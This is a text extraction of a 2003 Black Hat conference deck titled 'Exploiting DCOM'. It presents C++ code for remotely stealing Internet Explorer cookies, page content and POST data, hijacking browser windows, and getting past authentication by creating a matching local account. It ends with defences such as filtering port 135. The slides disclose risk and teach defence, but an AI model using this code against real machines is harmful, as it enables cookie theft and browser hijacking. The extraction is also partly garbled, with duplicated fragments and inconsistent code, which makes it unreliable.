bh win 03 security friday

8/8/2019 Bh Win 03 Security Friday

1/86

Exploiting DCOM

Yoshiaki Komoriya

[email protected]

Hidenobu [email protected]


2/86

Agenda

COM and DCOM technology

IE exploit demonstration

Exploit code

Authentication

MS-Word exploit demonstrationDCOM exploit prevention


3/86

Agenda



Exploit code

Authentication

MS-Word exploit demonstrationDCOM exploit prevention


4/86

Distributed COM

Application-level protocol for object-

oriented remote procedure call.

For constructing applications on

distributed computing environment.

DCOM is a seamless evolution ofCOM

according to Microsoft.


5/86

COM technology

Components oriented programming

model ofMicrosoft.

Can develop reusable programs by

using COM.


6/86

COM model

ClientProgram

Component

Interface

COMcomponents


7/86

DCOM

ClientProgram

Local PC

COMComponent

network

Distributed apps by using DCOM

DCOM

Remote PC


8/86

DCOM model

ClientProgram

Local PC

COM

component

Remote PC

DCOMRuntime

DCOMRuntime

DCOMProtocol

network


9/86

DCOM runtime

Installed by default

Windows XP, 2k, (98, Me)

Not installed by default

Windows NT

But installed with other apps (ex. IE)


10/86

DCOMCNFG.exe

DCOM Configuration Tool

View installed DCOM-enableapplications list.


11/86

List of DCOM-enabled apps

DCOM-enabledapps


12/86

Windows Built-in DCOM Apps

Internet Explorer

Windows media player

Windows Scripting Host

Sound recorder

WordPad

and more


13/86

Other Applications

Word

Excel

Outlook

PowerPoint

and more


14/86

COM components on Windows

Windows has many COM components.

Registered under

\HKEY_CLASSES_ROOT\CLSID onthe registry.


15/86

COM components in Registry


16/86

Agenda



Exploit code

DCOM authentication

MS-Word exploit demonstration

DCOM exploit prevention


17/86

IEen

Original IE exploit tool

Steal IEs data

Hijack IE

Can download fromwww.securityfriday.com


18/86

IEen

Local PC Remote PC

DCOM DCOM

network

Browsing URLsBrowsing contentsand more..

Create new window

Change browsing pageand more


19/86

Demonstration environment

Local PC

Windows XP

Remote PC

Windows 2k Professional ( Default )


20/86

Agenda



Exploit code

Authentication




21/86

Exploit code

Stealing IEs data

Hijacking IE


22/86

Exploit code

Stealing IEs data

Hijacking IE


23/86

Stealing IEs data

Browsing URL lists

Incoming data

Cookies

HTML contents

Navigation events

Get parameters

Post Parameters


24/86

Stealing IEs data

Browsing URL lists

Incoming data

Cookies

HTML contents

Navigation events

Get parameters

Post Parameters


25/86

Browsing URL list

1. Activate ShellWindows componenton remote PC.

2. Get IDispatch intarfaces fromIShellWindows interface.

3. GetIWebBrowser2 interfaces fromIDispatch interface.

4. Get browsing URL strings fromIWebBrowser2.


26/86

Activate ShellWindows// Initialize COM runtime

HRESULT hret = CoInitialize(NULL);

// Create COSERVERINFO structure contain remote PC IPCOSERVERINFO ServerInfo;ServerInfo.dwReserved1 = 0;ServerInfo.dwReserved2 = 0;ServerInfo.pwszName = L"RemotePC";ServerInfo.pAuthInfo = NULL;

// Get aIShellWindows

interface from remote PC

MULTI_QI qi = {&IID_IShellWindows, NULL, 0};hret = CoCreateInstanceEx(CLSID_ShellWindows, NULL,

CLSCTX_SERVER, &ServerInfo, 1, &qi);IShellWindows *windows = (IShellWindows*)qi.pItf;


27/86









28/86









29/86

Get IDispatch

// Get num of IE window by using IShellWindowslong nCount;hret = windows->get_Count(&nCount);

for(long i = 0; i < nCount; ++i){

// Get IDispatch interfaces from IShellWindowsIDispatch *disp = NULL;

VARIANT va; VariantInit(&va);

V_VT(&va) = VT_I4; V_I4(&va) = i;hret = windows->Item(va,&disp);VariantClear(&va);


30/86

Get IDispatch







31/86

Get IDispatch







32/86

Get IWebBrowser2

// Get IWebBrowser2 interfaces from IDispatchIWebBrowser2 *browser = NULL;

if(disp != NULL){

hret = disp->QueryInterface(IID_IWebBrowser2,(void**)&browser);}


33/86

Get browsing URL strings

// Get browsing URL stringif(browser != NULL){BSTR url;

hret = browser->get_LocationName(&url);}

}


34/86

Stealing IEs data

Browsing URL list

Incoming data

Cookie

HTML Contents

Navigation events

Get parameters

Post Parameters


35/86

Incoming data

cookie1. GetIHTMLDocument2 interface from

IWebBrowser2.2. Call get_cookie method of IHTMLDocument2.

HTML1. GetIHTMLElement interface from

IHTMLDocument2.2. Call get_outerHTML method of IHTMLElement.


36/86

Get cookie

// Get IHTMLDocument2 from IWebBrowser2IDispatch *htmlDisp = NULL;hret = browser->get_Document(&htmlDisp);IHTMLDocument2 *doc = NULL;

if(htmlDisp != NULL){hret = htmlDisp->QueryInterface(IID_IHTMLDocument2,

(void**)&doc);}

// Call get_cookie method of IHTMLDocument2if(theIHD != NULL){BSTR cookie;hret = doc->get_cookie(&cookie);

}


37/86

Get cookie



(void**)&doc);}

// Call get_cookie method of IHTMLDocument2if(theIHD != NULL){BSTR cookie;hret = doc->get_cookie(&cookie);

}


38/86

Get cookie



(void**)&doc);}

// Call get_cookie method of IHTMLDocument2if(theIHD != NULL){

BSTR cookie;hret = doc->get_cookie(&cookie);

}


39/86

Get HTML

// Get IHTMLElement from IHTMLDocument2IHTMLElement *element = NULL;hret = doc->get_body(&element);

// Call get_outerHTML of IHTMLElementif(element != NULL){BSTR html;hret = element->get_outerHTML(&html);

}


40/86

Get HTML



}


41/86

Get HTML



}


42/86

Stealing IEs data

Browsing URL list

Incoming data

Cookie

HTML Contents

Navigation events

Get parameters

Post Parameters


43/86

Navigation events

Client Program

IEEvent Handler

NavigationEvents


44/86

Navigation events

1. Create event handler implementingDWebBrowserEvents interface.

2. GetIConnectionPoint interfacethrough IWebBrowser2.

3. Advise IE where the event handler is

by using IConnectionPoint.


45/86

Members of DWebBrowserEvents

BeforeNavigate CommandStateChange

DownloadBegin DownloadComplete

NavigateComplete New indow

OnQuit ProgressChange

PropertyChange StatusTextChange

TitleChange indowActivate

indowMove indowResize


46/86

BeforeNavigate

void BeforeNavigate(

IDispatch* pDisp,

VARIANT* &url, // the new URL to be navigate to

VARIANT* &Flag,

VARIANT* &TargetFrameName,

VARIANT* &PostData,

// the POST data to send to the new URL

VARIANT* &Headers,

VARIANT_BOOL* &Cancel

);


47/86

BeforeNavigate


IDispatch* pDisp,


VARIANT* &Flag,


VARIANT* &PostData,


VARIANT* &Headers,


);


48/86

BeforeNavigate


IDispatch* pDisp,


VARIANT* &Flag,


VARIANT* &PostData,


VARIANT* &Headers,


);


49/86

Get IConnectionPoint

IConnectionPointContainer* container;

hret = browse->QueryInterface(

IID_IConnectionPointContainer,(void**)&container);

IConnectionPoint* point;

hret = container->FindConnectionPoint(

IID_DWebBrowserEvents,

&point);


50/86

Advise IE

Sink *sink = new Sink;

DWORD dwCookie;

hret = point->A

dvise(sink->GetIDispatch(false),&dwCookie);


51/86

Hijacking IE

Change browsing pages

Make IE windows invisible

Create new windows


52/86

Change browsing pages

BSTR newURL;newURL = SysAllocString(L"http://www.yahoo.co.jp");hret = browser->Navigate(newURL);


53/86

Make IE windows invisible

browser->put_Visible((VARIANT_BOOL)false);


54/86

Create new windows

COSERVERINFO ServerInfo2;ServerInfo.dwReserved1 = 0;ServerInfo.dwReserved2 = 0;ServerInfo.pwszName = L"RemotePC";ServerInfo.pAuthInfo = NULL;

MULTI_QI qi2 = {&IID_IWebBrowser2, NULL, 0};hret = CoCreateInstanceEx(

CLSID_InternetExplorer, NULL,CLSCTX_SERVER, &ServerInfo, 1, &qi);

IWebBrowser2 *browser2 = (IWebBrowser2*)qi2.pItf;


55/86

Agenda



Exploit code

Authentication




56/86

Authentication

Component activation procedures

Two steps of authentication

Event handling & Authentication

Exploit code

Special case: XP


57/86

Authentication

Component activation procedures



Exploit code

Special case: XP


58/86

Component activation procedure

LocalPC

RemotePC

1. NEGOTIATE

2. CHALLENGE

3. RESPONSE

4. CLSID

5. Results


59/86

Authentication




Exploit code

Special case: XP


60/86


Logonaudit

DCOMauthentication

ComponentClientProgram

Remote PC


61/86

Logon audit 1/2

LogonAudit

DCOMAuthentication

Component

Remote PC

Bill

XClientProgram

MikeZev

Joe


62/86

Logon audit 2/2

LogonAudit

DCOMAuthentication

Component

Remote PC

Joe

ClientProgram

MikeZev

Joe


63/86

DCOM authentication

Launch / Access control listControl launch / access permission

RunAs parameterAccount used to launch / access tocomponents


64/86

DCOM authentication

LogonAudit

DCOMAuthentication

Component

Remote PC

ClientProgram

RunAsAccount

ACL


65/86

Default setting of DCOM authentication

Launch / Access control list

SYSTEM, Administrators, INTERACTIVE

RunAs The launching user


66/86

Authentication




Exploit code

Special case: XP


67/86

Event handling model

Client Program

ComponentEvent Handler

NavigationEvents


68/86

Reverse authentication

LogonAudit

DCOMAuthentication

Component

Local PC

Eventhandler

Client Program


69/86

Authentication




Exploit code

Special case: XP


70/86

Exploit code

1. Set an account on local PC.

2. Create client process with new

accounts security context.


71/86

1. Set account on local PC

// Create USER_INFO_1 structureUSER_INFO_1 ui;ui.usri1_name = USERNAME;ui.usri1_password = PASSWORD;

ui.usri1_priv = USER_PRIV_USER;ui.usri1_home_dir = NULL;ui.usri1_comment = NULL;ui.usri1_flags = UF_SCRIPT;ui.usri1_script_path = NULL;

// Add new user to systemNetUserAdd(NULL, 1, (LPBYTE)&ui, NULL);


72/86






73/86






74/86

2. Create client process

PROCESS_INFORMATION process;

STARTUPINFOW startup;startup.dwFlags = STARTF_USESHOWWINDOW;

startup.wShowWindow = SW_SHOWNORMAL;

CreateProcessWithLogonW(USERNAME, NULL,PASSWORD, 0,NULL, EXPLOIT.exe, 0, NULL,

CURRENTDIR, &startup, &process);


75/86

Special case: XP

New security model.

Cannot exploit with XP default setting.


76/86

Special case: XP

LogonAudit

DCOMAuthentication

componentclient

Auser

guest

ACL

Remote PC

ClientProgram


77/86

Use classic security model 1/2


78/86

Use classic security model 2/2


79/86

Agenda



Exploit code

Authentication




80/86

Trojan Office

Local PC Remote PC

DCOM DCOM

network

Get recent files list

Open a document

Change a document


81/86

Demonstration environment

Local PC

Windows XP

Remote PC Windows 2k Professional


82/86

Agenda



Exploit code

Authentication




83/86


1. Filter port 135.

2. Disable DCOM.

3. Use a strong password orpass phrase.


84/86

Conclusion

Reveal the risks of DCOM with exploitdemonstrations.

Show the DCOM exploit techniques.Explain how to defend ourselves.


85/86

FAQQ: IEen doesnt work well on domain environment.

A: Latest version of IEen works.

Q: Why is the alert message displayed when"Contents" box is clicked?

A: The system sometimes goes down. I thinkget_outerHTML method has a memory leak,

Even if I use SysFreeString every time.

Q: Connection fails with Class not registered

message.A: Check the user name and password.


86/86

Reference

DCOM Technical Overviewhttp://msdn.microsoft.com/library/en-us/dndcom/html/msdn_dcomtec.asp

WebBrowser Controlhttp://msdn.microsoft.com/workshop/browser/webbrowser/reflist_cpp.asp

ShellWindows Objecthttp://msdn.microsoft.com/library/en-us/shellcc/platform/shell/reference/objects/shellwindows/shellwindows.asp

and others.

bh win 03 security friday

Documents